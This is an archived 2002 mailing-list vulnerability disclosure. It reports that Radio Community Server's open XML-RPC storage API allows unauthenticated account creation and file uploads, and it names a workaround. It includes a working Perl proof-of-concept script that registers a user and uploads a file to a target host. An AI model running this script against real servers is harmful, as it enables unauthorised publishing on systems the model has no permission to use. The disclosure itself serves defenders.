RCS public file sharing vulnerability

From: Gerhard Poul (gpoul@EUNET.AT)
Date: 07/07/02


Date:         Sun, 7 Jul 2002 17:34:36 +0200
From: Gerhard Poul <gpoul@EUNET.AT>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Hi,

This is a vulnerability Andreas and I found about eight weeks ago. This
was then first reported to the vendor and CERT. CERT received it on
5/10/02 at 8:01pm. They haven't yet done anything with it as far as I
can tell. - I haven't received anything from them except for the
automated responses.

I've attached the same description here that I also sent to CERT.
 
Best regards,
Gerhard Poul

CONTACT INFORMATION
========================================================================
=======

 Name : Gerhard Poul, Andreas Bolka
 E-mail : gpoul at eunet.at, andreas.bolka at gmx.net
 Phone / fax : [removed]
 Affiliation and address:

Have you reported this to the vendor? [yes/no] yes.

        If so, please let us know whom you've contacted:

        Date of your report : 5/9/02
        Vendor contact name : Dave Winer
        Vendor contact phone :
        Vendor contact e-mail : dave@userland.com
        Vendor reference number :

POLICY INFO
========================================================================
=======

        ___ Do not release my identity to your vendor contact.

TECHNICAL INFO
========================================================================
=======
If there is a CERT Vulnerability tracking number please put it here
(otherwise leave blank): VU#______.

Please describe the vulnerability.
---------------------------------

This vulnerability makes it possible for an intruder to use the open
SOAP or XML-RPC APIs published at
http://www.soapware.org/xmlStorageSystem to create user accounts and
upload random file data to any server running the Radio Community Server
as published by UserLand Software Inc. at http://rcs.userland.com

What is the impact of this vulnerability?
----------------------------------------

   a) What is the specific impact:

Intruders can publish public files on a server without any special user
permission over a network. - You don't need a user account or anything
else on the target machine to make this work.

   b) How would you envision it being used in an attack scenario:

This vulnerability enables attackers to publicly post files on any
machine running the vulnerable software package.

To your knowledge is the vulnerability currently being exploited?
----------------------------------------------------------------
        [yes/no] no.

If there is an exploitation script available, please include it here.
--------------------------------------------------------------------

#!/usr/bin/perl

use Frontier::Client;
use MIME::Base64 qw(encode_base64);

local($/) = undef; # slurp
$email = "John@test.com";
$name = "John Doe";
$password = "whateveryouwant.com";
$filename = $ARGV[0];

$server = Frontier::Client->new( 'url' => 'http://radiohost/RPC2',
                                 'debug' => 0 );
$file = $server->base64(encode_base64(<>));
$result = $server->call("xmlStorageSystem.registerUser", $email, $name,
$password, 81, 0, 0); $usernum = $result->{'usernum'}; $result =
$server->call("xmlStorageSystem.saveMultipleFiles", $usernum,
                        $password, [ $filename ], [ $file ]); $filename
= $result->{'urlList'}->[0]; print "New user with ID $usernum has been
created\n"; print "File has been uploaded to URI: $filename\n";

Do you know what systems and/or configurations are vulnerable?
-------------------------------------------------------------
        [yes/no] no.

        System :
        OS version :
        Verified/Guessed:

Are you aware of any workarounds and/or fixes for this vulnerability?
--------------------------------------------------------------------
        [yes/no] yes.

There is a setting in the RCS software that restricts remote new user
registrations. - By turning these remote registrations off, which are on
by default, you can work around this problem but it will also restrict
the usefulness of the community server.

OTHER INFORMATION
========================================================================
===

This vulnerability is an inherent design flaw of the xmlStorageSystem
XML-RPC or SOAP interface used between a Radio Client and a Radio
Community Server. - It has to be fixed in the specification first to
design a secure solution and every customer should be advised to
shutdown their Radio Community Servers immediately.

The vendor has been contacted but does not agree with our vulnerability
analysis.



Relevant Pages